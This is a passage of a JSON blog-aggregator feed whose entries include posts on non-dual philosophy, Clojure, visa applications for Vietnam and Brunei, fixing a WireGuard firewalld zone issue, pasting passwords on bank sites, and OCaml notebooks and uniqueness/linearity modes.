tutorial.",[],{"slug":436,"title":437,"link":438,"pubDate":439,"contentSnippet":440,"tags":441,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"beyond-self-improvement-letting-go-of-the-separate-self","Beyond Self-Improvement: Letting Go of the Separate Self","https:\u002F\u002Fwww.prashanthudupa.com\u002Fbeyond-self-improvement-letting-go-of-the-separate-self\u002F","Wed, 20 Aug 2025 14:08:29 +0000","We live in the age of self-improvement. Therapy, trauma-healing, productivity hacks, and endless self-help advice promise to make us better, happier, more fulfilled versions of ourselves. But have you ever stopped to ask: who or what is actually being improved? Is there really a fixed “self” at the center of all these efforts, or is […]",[148,149],{"slug":443,"title":444,"link":445,"pubDate":446,"contentSnippet":447,"tags":448,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"the-matrix-got-it-wrong","The Matrix Got It Wrong!","https:\u002F\u002Fwww.prashanthudupa.com\u002Fthe-matrix-got-it-wrong\u002F","Fri, 08 Aug 2025 15:52:53 +0000","The 1999 blockbuster “The Matrix” unpacked so many complex philosophical ideas in a way that complete non-philosophers could comprehend and munch on them. I clearly notice a fundamental shift in my understanding of reality before and after The Matrix. When I watched it for the first time, I knew I got something, but couldn’t put […]",[148,149,224],{"slug":450,"title":451,"link":452,"pubDate":453,"contentSnippet":454,"tags":455,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-3","Understanding not just Clojure's comp function by re-implementing it","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Flessons-from-reimplementing-clojure-comp-function\u002Findex.html","Fri, 08 Aug 2025 00:00:00 +0000","Because I realised thinking like this is not obvious to Clojure newcomers, especially those having non-FP first languages. Because I was there too, all those moons ago! Feat. a salty footnote about the misdirected rancour popularly heaped upon CSS (yes, Cascading Style Sheets), triggered by that fact that 'comp' is a combinator, and I think they should have called it Combinatory Styling System.",[52,456,457,49],"functional_programming","howto",{"slug":459,"title":460,"link":461,"pubDate":462,"contentSnippet":463,"tags":464,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"vietnam-visa","Tricked by a website while applying for Vietnam visa","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fvietnam-visa\u002F","Wed, 06 Aug 2025 04:25:05 +0530","In December 2024, Badri and I went to Vietnam. In this post, I’ll document our experiences with the visa process of Vietnam. Vietnam requires an e-visa to enter the country. The official online portal for the e-visa application is evisa.xuatnhapcanh.gov.vn\u002F. However, I submitted my visa application on the website vietnamvisa.govt.vn. It was only after submitting my application and making the payment that I realized that it’s not the official e-visa website. The realization came from the tagline mentioned in the top left corner of the website - the best way to obtain a Vietnam visa.\nI was a bit upset that I got tricked by that website. I should have checked the top level domains of Vietnam’s government websites. Anyways, it is pretty easy to confuse govt.vn with gov.vn. I also paid double the amount of the official visa fee. However, I wasn’t asked to provide a flight reservation or hotel bookings - documents which are usually asked for most of the visas. But they did ask me for a photo. I was not even sure whether the website was legit or not.\nBadri learnt from my experience and applied through the official Vietnam government website. During the process, he had to provide a hotel booking as well as enter the hotel address into the submission form. Additionally, the official website asked to provide the exact points of entry to and exit from the country, which the non-official website did not ask for. On the other hand, he had to pay only 25 USD versus my 54 USD.\nIt turned out that the website I registered on was also legit, as they informed me a week later that my visa has been approved, along with a copy of my visa. Further, I was not barred from entering and found to be holding a fake visa. It appears that the main “scam” is not about the visa being fake, but rather that you will be charged more than if you apply through the official website.\nI would still recommend you (the readers) to submit your visa application only through the official website and not on any of the other such websites.\nOur visa was valid for a month (my visa was valid from the 4th of December 2024 to the 4th of January 2025). We also had a nice time in Vietnam. Stay tuned for my Vietnam travel posts!\nCredits to Badri for proofreading and writing his part of the experience.",[],{"slug":466,"title":467,"link":468,"pubDate":469,"contentSnippet":470,"tags":471,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"turiya-pure-consciousness","Turiya (Pure-Consciousness)","https:\u002F\u002Fwww.prashanthudupa.com\u002Fturiya-pure-consciousness\u002F","Sun, 03 Aug 2025 09:27:49 +0000","Many spiritual traditions say that enlightenment reveals the world as an illusion and lets you see true reality. But what does that really mean? The Mandukya Upanishad describes four states of human experience: waking, dreaming, deep sleep, and a fourth called Turiya. The Four States The first three—waking, dreaming, and deep sleep—are familiar to us. […]",[149],{"slug":473,"title":474,"link":475,"pubDate":476,"contentSnippet":477,"tags":478,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"pull-back-from-the-machine","Pull back from the machine","https:\u002F\u002Fwww.prashanthudupa.com\u002Fpull-back-from-the-machine\u002F","Sat, 02 Aug 2025 06:30:48 +0000","Introduction Recently my older brother stumbled upon a AI documentation generator called DeepWiki, and shared a full documentation of my Scrite project he generated using it. DeepWiki can parse the source code of any project hosted on a public Git repository like GitHub and construct documentation explaining the architecture and implementation. Benefits of AI-Documentation Back […]",[148,149],{"slug":480,"title":481,"link":482,"pubDate":483,"contentSnippet":484,"tags":485,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"observer-observed","Observer = Observed","https:\u002F\u002Fwww.prashanthudupa.com\u002Fobserver-observed\u002F","Fri, 01 Aug 2025 07:55:41 +0000","On my morning walk in the park today, I had this very surreal knowing that my mind was I was reduced to a mere witness of this whole show. Yet, oddly, it did not feel like a reduction. It felt like the mind was dipping into “me” to construct both the world and the experiencer […]",[148,486,149],"Moments",{"slug":488,"title":489,"link":490,"pubDate":491,"contentSnippet":492,"tags":493,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"wireguard-route-fix","TIL: WireGuard's Misleading \"No Route to Host\" Error","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fwireguard-route-fix\u002F","2025-07-30T00:00:00.000Z","I recently spent some time debugging a WireGuard tunnel that was acting weird. The handshake was successful, pings worked perfectly, but any TCP connection failed with connect: no route to host.\nClassic misleading error message. The routing was fine.\nThe Setup#\nServer with a public IP running WireGuard (wg0) with IP 10.100.0.1\u002F24. Client connects and gets assigned 10.100.0.2\u002F32. I wanted to proxy TCP traffic from the server to a service running on the client at 10.100.0.2:7778.\nThe Investigation#\nDiagnostics showed contradictory results:\nRouting worked fine: Server routing table correctly directed 10.100.0.0\u002F24 traffic to wg0. Pings were successful:\n# On the server\n$ ping -c 3 10.100.0.2\nPING 10.100.0.2 (10.100.0.2) 56(84) bytes of data.\n64 bytes from 10.100.0.2: icmp_seq=1 ttl=64 time=150 ms\n...\nTCP failed immediately:\n# On the server\n$ curl -v http:\u002F\u002F10.100.0.2:7778\n* Trying 10.100.0.2:7778...\n* connect to 10.100.0.2 port 7778 from 10.100.0.1 port 59812 failed: No route to host\nThe key insight: ICMP was being treated differently than TCP. This pointed to a firewall issue, not routing. The “no route to host” error was the kernel interpreting an ICMP “Destination Unreachable” message from the remote peer.\nBut when I ran tcpdump on the client, things got stranger:\n# On the client\n$ sudo tcpdump -i any -n 'host 10.100.0.1'\n\n# Output when the server tries to connect\n17:36:03.043147 wg0 In  IP 10.100.0.1.14808 > 10.100.0.2.7778: Flags [S], seq 324784341, win 42780, ...\nThe TCP SYN packet arrived successfully through wg0. But no response. No SYN-ACK (success), no ICMP error (rejection). The packet was being silently dropped.\nThe Culprit: firewalld#\nThe client was running Arch Linux with firewalld. My mistake was trying to manage firewall rules with iptables commands in the WireGuard PostUp script. While iptables was installed, firewalld was the active manager, using nftables as its backend.\nWhen a new interface like wg0 comes up, firewalld needs to know which “zone” it belongs to. If unassigned, it gets handled by a restrictive default policy that silently DROPs unsolicited TCP packets while allowing ICMP (pings).\nThe Fix#\nDon’t add iptables rules. Just assign the WireGuard interface to the right firewalld zone. For internal tunnels, trusted works well.\nOn the client:\nsudo firewall-cmd --permanent --zone=trusted --add-interface=wg0\nsudo firewall-cmd --reload\nTCP connections worked instantly after this.\nTL;DR: If WireGuard pings work but TCP fails with “no route to host”, it’s probably a client firewall issue. On firewalld systems, assign the WireGuard interface to the right zone instead of messing with iptables.\nFin!",[],{"slug":495,"title":496,"link":497,"pubDate":498,"contentSnippet":499,"tags":500,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"how-to-paste-password-on-bank-site","How to paste your password on your bank's website","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fhow-to-paste-password-on-bank-site\u002F","Tue, 29 Jul 2025 13:08:51 +0530","If your bank is like mine, its website doesn’t allow you to copy your password and paste it by performing a simple Ctrl+V. I tried the Don’t Fuck With Paste extension in Firefox, which could paste my bank account’s profile password but not the login password.\nTherefore, I asked on Mastodon a couple of days ago and got some responses. The solution that worked for me was to use Shift+Insert to paste the password. It worked for me in LibreWolf and Firefox, and that’s all I needed.\nFurthermore, this behavior by bank websites leads to users choosing insecure and memorable passwords. Using this trick will help you choose strong passwords for your bank account.\nI prefer to use random and strong passwords generated using the password manager pass. It is a freedom-respecting software, unlike popular proprietary password managers promoted by YouTubers. Feel free to check out their webpage here. The reason I use pass is that it stores all the passwords locally (and optionally in a remote Git repository) in encrypted form, which can only be decrypted using your private GPG keys.",[],{"slug":502,"title":503,"link":504,"pubDate":505,"contentSnippet":506,"tags":507,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"morality-choice-free-will-and-responsibility","Morality, Choice, Free-Will, and Responsibility","https:\u002F\u002Fwww.prashanthudupa.com\u002Fmorality-choice-free-will-and-responsibility\u002F","Fri, 25 Jul 2025 06:29:16 +0000","In our everyday experience, we often think of ourselves as a separate “Self”-a permanent entity that is distinct from everything else in the world, including other people and things. This sense of separation can lead to anxiety, fear, and other forms of suffering. Non-duality offers a radical shift in perspective. Instead of seeing ourselves as […]",[148,149],{"slug":509,"title":510,"link":511,"pubDate":512,"contentSnippet":513,"tags":514,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"on-memory","On Memory","https:\u002F\u002Fwww.prashanthudupa.com\u002Fon-memory\u002F","Sun, 20 Jul 2025 08:18:16 +0000","Memory is whatever the mind brings up. Hypothetically, the mind can create random images, thoughts, and bodily sensations that feel like memories. Even when the body-mind system is working perfectly, memory is always at the mercy of whatever it pulls up in the moment. It’s possible that the body-mind system isn’t buggy and it never […]",[148,149],{"slug":516,"title":517,"link":518,"pubDate":519,"contentSnippet":520,"tags":521,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"maya","māyā – ಮಾಯಾ – माया","https:\u002F\u002Fwww.prashanthudupa.com\u002Fmaya\u002F","Tue, 15 Jul 2025 17:06:50 +0000","The term māyā is often translated as “illusion”—a powerful force that makes the dualistic world appear real, even though only the non-dual Brahman truly exists. However, I prefer to interpret māyā not as “illusion” but as “disappearance” or “vanishing” (in its street-Kannada sense). In truth, all of reality is constantly vanishing into a void. This […]",[148,149],{"slug":523,"title":524,"link":525,"pubDate":526,"contentSnippet":527,"tags":528,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-4","Poor man's bitemporal data system in SQLite and Clojure","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fpoor-mans-time-oriented-data-system\u002Findex.html","Mon, 14 Jul 2025 00:00:00 +0000","On trying to mash up SQLite with ideas stolen from Accountants, Clojure, Datomic, XTDB, Rama, and Local-first-ers, to satisfy Henderson's Tenth Law. Viz., to make a sufficiently complicated data system containing an ad-hoc, informally-specified, bug-ridden, slow implementation of half of a bitemporal database. Because? Because laying about on a hammock, contemplating hopelessly complected objects like Current Databases isn't just for the Rich man.",[456,52,529,530,531,532,227,533],"databases","architecture","software_design","local_first","web_development",{"slug":535,"title":536,"link":537,"pubDate":538,"contentSnippet":539,"tags":540,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"there-is-no-doer","Awareness is always after the fact","https:\u002F\u002Fwww.prashanthudupa.com\u002Fthere-is-no-doer\u002F","Tue, 08 Jul 2025 05:06:22 +0000","Awareness is always of what has already happened. I become aware of what I see only after the seeing has occurred.I become aware of what I hear only after the hearing has happened.I become aware of what I touch only after the touch has occurred.I become aware of what I taste only after the tasting […]",[148,149],{"slug":542,"title":543,"link":544,"pubDate":545,"contentSnippet":546,"tags":547,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-5","Riff: LLMs are Software Diamonds","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fllms-are-diamonds\u002Findex.html","Tue, 01 Jul 2025 00:00:00 +0000","The making of a diamond is a repeatable, but naturally non-reproducible process. The exact same input of carbon subject to the exact same configuration of pressure, temperature, forge, time, process control will never produce the exact same diamond twice. Once made, a diamond is unique. And once made, a diamond is forever.",[55,49,244,245,246],{"slug":549,"title":550,"link":551,"pubDate":552,"contentSnippet":553,"tags":554,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"brunei-visa","Getting Brunei visa","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fbrunei-visa\u002F","Sat, 21 Jun 2025 13:30:51 +0530","In December 2024, my friend Badri and I were planning a trip to Southeast Asia. At this point, we were planning to visit Singapore, Malaysia and Vietnam. My Singapore visa had already been approved, and Malaysia was visa-free for us. For Vietnam, we had to apply for an e-visa online.\nWe considered adding Brunei to our itinerary. I saw some videos of the Brunei visa process and got the impression that we needed to go to the Brunei embassy in Kuching, Malaysia in person.\nHowever, when I happened to search for Brunei on Organic Maps1, I stumbled upon the Brunei Embassy in Delhi. It seemed to be somewhere in Hauz Khas. As I was going to Delhi to collect my Singapore visa the next day, I figured I’d also visit the Brunei Embassy to get information about the visa process.\nThe next day I went to the location displayed by Organic Maps. It was next to the embassy of Madagascar, and a sign on the road divider confirmed that I was at the right place.\nThat said, it actually looked like someone’s apartment. I entered and asked for directions to the Brunei embassy, but the people inside did not seem to understand my query. After some back and forth, I realized that the embassy wasn’t there.\nI now searched for the Brunei embassy on the Internet, and this time I got an address in Vasant Vihar. It seemed like the embassy had been moved from Hauz Khas to Vasant Vihar. Going by the timings mentioned on the web page, the embassy was closing in an hour.\nI took a Metro from Hauz Khas to Vasant Vihar. After deboarding at the Vasant Vihar metro station, I took an auto to reach the embassy. The address listed on the webpage got me into the correct block. However, the embassy was still nowhere to be seen. I asked around, but security guards in that area pointed me to the Burundi embassy instead.\nAfter some more looking around, I did end up finding the embassy. I spoke to the security guards at the gate and told them that I would like to know the visa process. They dialled a number and asked that person to tell me the visa process.\nI spoke to a lady on the phone. She listed the documents required for the visa process and mentioned that the timings for visa application were from 9 o’clock to 11 o’clock in the morning. She also informed me that the visa fees was ₹1000.\nI also asked about the process Badri, who lives far away in Tamil Nadu and cannot report at the embassy physically. She told me that I can submit a visa application on his behalf, along with an authorization letter.\nHaving found the embassy in Delhi was a huge relief. The other plan - going to Kuching, Malaysia - was a bit uncertain, and we didn’t know how much time it would take. Getting our passport submitted at an embassy in a foreign country was also not ideal.\nA few days later, Badri sent me all the documents required for his visa. I went to the embassy and submitted both the applications. The lady who collected our visa submissions asked me for our flight reservations from Delhi to Brunei, whereas ours were (keeping with our itinerary) from Kuala Lampur. She said that she might contact me later if it was required.\nFor reference, here is the list of documents we submitted -\nVisa application form\nPassport\nA photocopy of passport\nAuthorization letter from Badri (authorizing me to submit his application on his behalf)\nAirline ticket itinerary\nHotel bookings\nCover letter\n2 photos\nProof of employment\n6 months bank statement (they specifically asked for ₹1,00,000 or more in bank balance)\nI then asked about the procedure to collect the passports and visa results. Usually, embassies will tell you that they will contact you when they have decided on your applications. However, here I was informed that if they don’t contact me within 5 days, I can come and collect our passports and visa result between 13:30-14:30 hours on the fifth day. That was strange :)\nI did visit the embassy to collect our visa results on the fifth day. However, the lady scolded me for not bringing the receipt she gave me. I was afraid that I might have to go all the way back home and bring the receipt to get our passports. The travel date was close, and it would take some time for Badri to receive his passport via courier as well.\nFortunately, she gave me our passports (with the visa attached) and asked me to share a scanned copy of the receipt via email after I get home.\nWe were elated that our visas were approved. Now we could focus on booking our flights.\nIf you are going to Brunei, remember to fill their arrival card from the website within 48 hours of your arrival!\nThanks to Badri and Contrapunctus for reviewing the draft before publishing the article.\nNowadays, I prefer using Comaps instead of Organic Maps and recommend you do the same. Organic Maps had some issues with its governance and the community issues weren’t being addressed. ↩︎",[],{"slug":556,"title":557,"link":558,"pubDate":559,"contentSnippet":560,"tags":561,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"xocaml","Testing x-ocaml, OCaml notebooks as a WebComponent","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fx-ocaml\u002Fblogging\u002F2025\u002F06\u002F20\u002Fxocaml\u002F","2025-06-20T10:00:00.000Z","Can we have OCaml notebooks as pure client-side code? Can these notebooks have\nrich editor support (highlighting, formatting, types on hover, autocompletion,\ninline diagnostics, etc.)? Can you take packages from OPAM and use them in these\nnotebooks?\nThe answer to all of these turns out to be a resounding yes thanks for\nx-ocaml. This post is my experiment playing\nwith x-ocaml and integrating that into this blog.\nThe most wonderful thing about programming is that it lets you experiment\nfreely. You can try out an idea, get instant feedback, and learn by doing—much\nlike playing with Lego bricks or sketching on a canvas. The two main courses\nthat I teach at IITM, CS3100 and\nCS6225, both involve me\nlive-coding during every lecture. However, blogging about OCaml where the code\nis static and non-interactive always felt a bit unsatisfying.\nEnter x-ocaml, which allows for a way to\nembed OCaml notebooks into any webpage thanks to WebComponents. All you need to\ndo is to load some JavaScript in your webpage and you can start embedding code\ncells using \u003Cx-ocaml> tag. The snippet below:\n\n\u003Cx-ocaml>\nprint_endline \"Hello, world\"\n\u003C\u002Fx-ocaml>\n\n\nrenders to:\nThe code is interpreted in the browser thanks to the OCaml interpreter compiled\nto JavaScript through the\nJs_of_ocaml compiler.\nThere is also support for Merlin and\nOCamlformat in the code editor. Try\nhovering over the functions and writing some code. You should see inferred types\nand auto-completion suggestions. It turns out that this solution integrates well\nwith Jekyll, which is what I use for this blog.\nReverse-mode AD using Effects\nJs_of_ocaml also supports effect\nhandlers. Here’s the\nimplementation of reverse-mode algorithmic\ndifferentiation,\nimplemented using effect handlers running in the browser.\nHere are some tests.\nUsing other libraries\nx-ocaml also supports loading any js_of_ocaml compatible library into the\nwebpage. Let’s use digestif.\nFor any library that you want to export, install the library using opam.\nx-ocaml provide a command-line utility to export the library.\n\n$ x-ocaml --effects digestif.ocaml -o digestif.js\n\n\nThis produces the JavaScript artifact that can be used in the webpage. It may be\ninstructive to look at the\nsource\nof this post to see how the compiler and the libraries are integrated into this\nblog post. There is a little script at the top of the file:\n\n\n\u003Cscript async\n  src=\"{{ '\u002Fassets\u002Fx-ocaml.js' | absolute_url }}\"\n  src-worker=\"{{ '\u002Fassets\u002Fx-ocaml.worker+effects.js' | absolute_url }}\"\n  src-load=\"{{ '\u002Fassets\u002Fdigestif.js' | absolute_url }}\"\n>\u003C\u002Fscript>\n\n\n\nWhat next?\nThere is a number of rough edges to x-ocaml. This is expected since this\nproject appears to be one of Arthur’s hacking\nexpeditions (which, as usual, is pushing the state of the art forward).\nIt would be fun to use this for teaching\nCS3100 and also\nother\nOCaml\ntutorials.\nPerhaps even have an interactive version of Real World OCaml\nbook.\nNot all OCaml libraries can be compiled to JavaScript. The common reason being\nthat they may depend on features not available on JavaScript. In writing this\npost, I unsuccessfully tried for a long time to get\nmirage-cypto working.\nmirage-crypto has a large C\ndependency, which\ndoes not work with Js_of_ocaml. Js_of_ocaml promises to take any opam library\ninstalled on your opam switch and compiles that to JavaScript. However, at that\npoint, we’re really cross compiling the opam packages installed on your switch to\nJavaScript since the installed package may make some assumptions about the\nplatform that it is supposed to run on. Hence, JavaScript compilation of\narbitrary OCaml packages is unlikely to work in the general case. Unfortunately,\nthe error was difficult to debug since the failure was at runtime, and was not\napparent in the error messages (at least for me, who has little JavaScript\nexperience). It would be nice to have the opam packages explicitly say whether\nthey are JavaScript compatible, and have build tooling that reports errors like\nthese early.",[],{"slug":563,"title":564,"link":565,"pubDate":566,"contentSnippet":567,"tags":568,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"linearity-and-uniqueness","Linearity and uniqueness","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmodes\u002Foxcaml\u002F2025\u002F06\u002F04\u002Flinearity_and_uniqueness\u002F","2025-06-04T10:00:00.000Z","In the last post,\nwe looked at uniqueness mode and how uniqueness may be used to optimise. As we\nwill see, uniqueness alone is insufficient in practice, and we also need a\nconcept of linearity for uniqueness to be useful.\nCapturing unique values\nLet’s start with an example. Recall the signature of the unique reference\nmodule.\n\nmodule type Unique_ref = sig\n  type 'a t\n  val alloc : 'a -> 'a t @ unique\n  val free : 'a t @ unique -> unit\n  val get : 'a t @ unique -> 'a Modes.Aliased.t * 'a t @ unique\n  val set : 'a t @ unique -> 'a -> 'a t @ unique\nend\n\n\nAssume that we also have an implementation of the module:\n\nmodule Unique_ref : Unique_ref\n\n\nConsider the following example, which works fine:\n\nlet works () =\n  let t = alloc 42 in (* Allocate a unique reference *)\n  free t (* free it *)\n\n\nNow consider this modified example:\n\nlet wat () =\n  let t = alloc 42 in (* Allocate a unique reference *)\n  let f () = free t in (* capture free in a closure *)\n  f (); (* free it *)\n  f () (* free it again??? *)\n\n\nObserve that f has captured t in the closure, and when called frees t. It\nshould be clear that calling f more than once is bad – leads to a\ndouble-free issue! What property do we want of f? Uniqueness is insufficient;\nwe have a unique reference to f in this program, with which we call f twice.\nWhat we want to enforce is that f can be called at most once. The compiler\nhas a linearity mode which captures the idea of how many times a value can be\nused. We have two modes in the linearity axis – once, which stands for\n“at most once” and many (the default one for all values), which allows values\nto be used arbitrary number of times.\nWhenever a unique value is captured by a closure, the closure gets a once\nmode, which allows the closure to be called at most once. This program rightly\ngets rejected by the compiler.\n\nFile \".\u002Funique_ref.ml\", line 32, characters 2-3:\n32 |   f () (* free it again??? *)\n       ^\nError: This value is used here,\n       but it is defined as once and has already been used:\nFile \".\u002Funique_ref.ml\", line 31, characters 2-3:\n31 |   f (); (* free it *)\n       ^\n\n\nA linear ref\nNow, one might wonder whether the unique reference that we’ve implemented may be\nimplemented with the linear mode. The answer is yes.\n\nmodule type Linear_ref = sig\n  type 'a t\n  val alloc : 'a -> 'a t @ once\n  val free : 'a t @ once -> unit\n  val get : 'a t @ once -> 'a * 'a t @ once\n  val set : 'a t @ once -> 'a -> 'a t @ once\nend\n\nmodule Linear_ref : Linear_ref = struct\n  type 'a t = { mutable value : 'a }\n  let alloc x = { value = x }\n  let free t = ()\n  let get t =\n    t.value, t\n  let set t x =\n    t.value \u003C- x;\n    t\nend\n\n\nThis works as expected:\n\nopen Linear_ref\n\nlet works () =\n  let r = alloc 42 in\n  let v,r = get r in\n  let r = set r (v + 1) in\n  let v,r = get r in\n  print_int v;\n  free r;\n  ()\n\nlet fails () =\n  let r = alloc 42 in\n  free r;\n  get r (* fails here *)\n\n\nwith the error message:\n\nFile \".\u002Flinear_ref.ml\", line 34, characters 6-7:\n34 |   get r (* fails here *)\n           ^\nError: This value is used here,\n       but it is defined as once and has already been used:\nFile \".\u002Flinear_ref.ml\", line 33, characters 7-8:\n33 |   free r;\n\n\nWhy both linearity and uniqueness?\nGiven this example, you might be wondering, if the safe reference may be\nimplemented equivalently using both uniqueness and linearity, why do we need\nboth? Obviously, there’s something interesting going on where unique values\ncaptured in a closure needs linearity. Does that mean linearity is sufficient?\nIt turns out that only recently was the relationship between the two formally\nstudied in the same type system. While linear types and uniqueness types have a\nlong history of being studied independently, Marshall et al. in their paper,\n“Linearity and Uniqueness: An Entente\nCordiale”, present the ideas in\nthe same type system. They provide some key insights.\nThe first insight is that\nin a setting where all values must be linear, we can also guarantee that every value is unique, and vice versa! Intuitively, if it is never possible to duplicate a value, then it will never be possible for said value to have multiple references.\nIn our Unique_ref and Linear_ref every operation that operates on the ref\nrequires uniqueness or linearity, respectively. Hence, they seem almost\nequivalent in expressive power.\nIt is when we also have the ability for unrestricted use (non-linear\u002Fnon-unique) that differences between linearity and uniqueness begin to arise, as we will soon see.\nIn our language, we do have the ability for unrestricted use. That is, in the\nlinearity axis, many is the default mode attributed to all the values not\ntagged or inferred as once. Similarly, aliased is the default mode\nattributed to all the values not tagged or inferred as unique.\nThe type system has submoding: values may move freely to greater modes\n(which typically restrict what can be done with those values) but not to\nlesser modes. For example, a many value may be safely use in a context where\na once value is expected.\n\nlet works () =\n  let set_to_20 (r @ once) =\n    r := 20\n  in\n  let r @ many = ref 10 in\n  set_to_20 r (* [r @ many] is passed to a function that expects [int ref @ once] *)\n\n\nSimilarly, you can use a unique value in a context where an aliased value is\nexpected.\n\nlet dup r = r,r\n\nlet works () =\n  let r = Unique_ref.alloc 42 in\n  let a,b = dup r in\n  a,b\n\n\nThe type of the works function is val works : unit -> int Unique_ref.t * int\nUnique_ref.t, which crucially lacks the fact that the references are at unique\nmode. We can’t call any functions from the Unique_ref module with these\nreferences, all of which expect a reference with unique mode.\nUniqueness is more appropriate for safe refs\nIn our running example of implementing a safe ref, it turns out that uniqueness\nis more appropriate. Consider the type signature of free in Unique_ref:\n\nval free : 'a t @ unique -> unit\n\n\nThe type signature says that there are no other aliases to this reference.\nHence, its memory may be safely deallocated. However, consider the\nLinear_ref.free signature:\n\nval free : 'a t @ once -> unit\n\n\nThe signature says that this reference must be used at most once. In particular,\njust by looking at the signature, we cannot conclude that there are no other\naliases to this reference. But we know that the API is safe since the only way\nto create a safe reference is through the alloc function, which returns a\nonce-usable reference, and every other operation also expects and returns a\nonce-usable reference.\nThe correctness of the linear version depends on reasoning over the whole\nAPI, whereas the unique version can be concluded to be safe just by\nlooking at the signature of the free function. This modular reasoning makes\nuniqueness more appropriate for our safe reference API.\nPast and the future\nIn a sense, uniqueness and linearity are duals of each other. Uniqueness talks\nabout the past – whether a value may be aliased in the past. It is okay to\nalias a unique value in the future and lose the uniqueness mode. Linearity talks\nabout the future – whether a value may be used more than once in the future.\nYou can take any value and ascribe a linear mode to it, restricting its use in\nthe future. However, there may be other aliases to this value in the past.\nConclusions\nThe code examples are available\nhere.\nSection 2.1 of Marshall et al.’s\npaper is quite readable and\nexplains the distinction between linearity and uniqueness with some historical\ncontext. I highly recommend it.\nAcknowledgements\nThanks to Richard Eisenberg for the discussions which\nspurred this post.",[],{"slug":570,"title":571,"link":572,"pubDate":573,"contentSnippet":574,"tags":575,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"uniqueness-and-behavioural-types","Uniqueness for Behavioural Types","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmodes\u002Foxcaml\u002F2025\u002F05\u002F29\u002Funiqueness_and_behavioural_types\u002F","2025-05-29T17:56:00.000Z","Jane Street has been developing modal types for OCaml – an extension to the\ntype system where modes track properties of values, such as their scope, thread\nsharing, and aliasing. These modes restrict which operations are permitted on\nvalues, enabling safer and more efficient systems programming. In this post, I\nfocus on the uniqueness mode, which tracks aliasing, and show how it can\neliminate certain runtime checks.\nMy intention in this post is not to explain how the different modes work. There\nare a number of blog posts and academic papers written about modes. I recommend\nthe interested reader to have look at them. The following table summarizes the\nmain properties tracked by modes, the corresponding mode names, and resources\nfor further reading:\nProperty\n      Modes\n      Resources\n    \nScope\n      Locality\n      Blog, Paper\n    \nSharing between threads\n      Portability, Contention\n      Blog, Paper\n    \nAliasing\n      Uniqueness, Linearity\n      Blog, Paper\n    \nThe OCaml compiler extended with modes is developed in the\nopen, and is used in\nproduction at Jane Street. The repo also has some\ndocumentation\nof the extensions.\nBe warned that the compiler and the language features are fast evolving. The\ncode examples presented in the blog and the paper referenced above are likely\nnot to work. I expect the same for the code examples in this post in the near\nfuture, but that’s what one should expect with these bleeding-edge features.\nBehavioural types and runtime overhead\nA couple of years ago, I wrote a post on behavioural\ntypes where the\ntypes capture the sequence of operations that may be performed on the values\nwith those types. The correctness of the system depended on the linear use of\nthe resources. Since OCaml does not provide support for enforcing linearity\nstatically, the implementation uses a dynamic check, using a fresh ref cell that\ngets consumed every time the type state changes. If we are guaranteed that the\nresource is not aliased statically, then there’s no need for the dynamic check.\nThis is where uniqueness helps.\nUniqueness mode allows the OCaml compiler to statically guarantee that certain\nvalues are not aliased. This enables optimizations and eliminates the need for\nsome runtime checks, which is particularly valuable in systems programming for\nensuring memory safety and efficient resource management.\nSetting up OCaml with modes\nAn opam repository with the modes extensions and packages supporting modes is\navailable\nhere.\nHere’s how you can set up the new compiler:\n\n# this will take time\nopam switch create 5.2.0+flambda2 --repos with-extensions=git+https:\u002F\u002Fgithub.com\u002Fjanestreet\u002Fopam-repository.git#with-extensions,default\neval $(opam env --switch 5.2.0+flambda2)\n\n\nAn explicitly memory-managed reference\nSuppose you want to implement a mutable reference whose memory is explicitly\nmanaged (not managed by the GC), you may go for the following interface:\n\nmodule type S = sig\n  type 'a t\n  val alloc : 'a -> 'a t\n  val free : 'a t -> unit (* unsafe *)\n  val get : 'a t -> 'a\n  val set : 'a t -> 'a -> unit\nend\n\n\nThis interface provides an explicit free, which releases the memory associated\nwith this reference. This opens up the possibility of memory safety bugs such as\nuse-after-free and double-free. We can use uniqueness modality to get a safe\nAPI. Here’s the interface:\n\nmodule type S = sig\n  type 'a t\n  val alloc : 'a -> 'a t @ unique\n  val free : 'a t @ unique -> unit\n  val get : 'a t @ unique -> 'a Modes.Aliased.t * 'a t @ unique\n  val set : 'a t @ unique -> 'a -> 'a t @ unique\nend\n\n\nThe unique annotation states that the value is not aliased. The operations on\nthe reference expect that this reference is not aliased. Observe that get and\nset take in the unique reference and also return them unlike the original\ninterface. You can use this like so:\n\n# let okay r =\n    let v, r = get r in\n    let r = set r 20 in\n    free r;;\nval okay : int M.t @ unique -> unit = \u003Cfun>\n\n\nThe key bit is that free 